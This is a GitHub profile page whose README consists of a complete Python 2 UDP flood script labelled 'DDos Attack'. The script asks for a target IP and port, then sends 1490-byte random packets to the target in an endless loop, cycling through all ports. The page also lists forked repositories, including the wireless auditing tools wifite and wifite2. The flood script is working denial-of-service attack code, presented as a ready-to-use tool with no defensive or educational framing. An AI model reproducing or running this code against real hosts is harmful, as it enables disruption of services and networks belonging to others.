Skip to content
View 4lp3x's full-sized avatar

Block or report 4lp3x

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
4lp3x/README.md

import sys import os import time import socket import random #Code Time from datetime import datetime now = datetime.now() hour = now.hour minute = now.minute day = now.day month = now.month year = now.year

############## sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bytes = random._urandom(1490) #############

os.system("clear") os.system("figlet DDos Attack") print print "Author : Tech Tushar" print "You Tube : https://www.youtube.com/c/TechTushar" print "github : https://github.com/Techtushar07" print "Facebook : https://www.facebook.com/daveratushar/" print ip = raw_input("IP Target : ") port = input("Port : ")

os.system("clear") os.system("figlet Attack Starting") print "[ ] 0% " time.sleep(5) print "[===== ] 25%" time.sleep(5) print "[========== ] 50%" time.sleep(5) print "[=============== ] 75%" time.sleep(5) print "[====================] 100%" time.sleep(3) sent = 0 while True: sock.sendto(bytes, (ip,port)) sent = sent + 1 port = port + 1 print "Sent %s packet to %s throught port:%s"%(sent,ip,port) if port == 65534: port = 1

Popular repositories Loading

  1. MusicBot MusicBot Public

    Forked from umutxyp/MusicBot

    An enhanced music bot that is compatible with discord.js v14 and works with slash commands. Discord music bot codes that can be used on any server and are simple to install.

    JavaScript

  2. Termux-Banner Termux-Banner Public

    Forked from Bhai4You/Termux-Banner

    Termux Banner Maker Script by Parixit Sutariya (BullAnonymous)

    Shell

  3. wifite wifite Public

    Forked from derv82/wifite

    Python

  4. wifite2 wifite2 Public

    Forked from derv82/wifite2

    Rewrite of the popular wireless network auditor, "wifite"

    Python

  5. termux-archlinux termux-archlinux Public

    Forked from SDRausty/termux-archlinux

    You can use setupTermuxArch.bash 📲 to install Arch Linux in Termux on Amazon, Android, Chromebook and Windows. https://sdrausty.github.io/termux-archlinux/

    Shell

  6. sosyal-hesaplarim sosyal-hesaplarim Public

    Forked from parsherr/Linktree_benzeri_site

    site

    HTML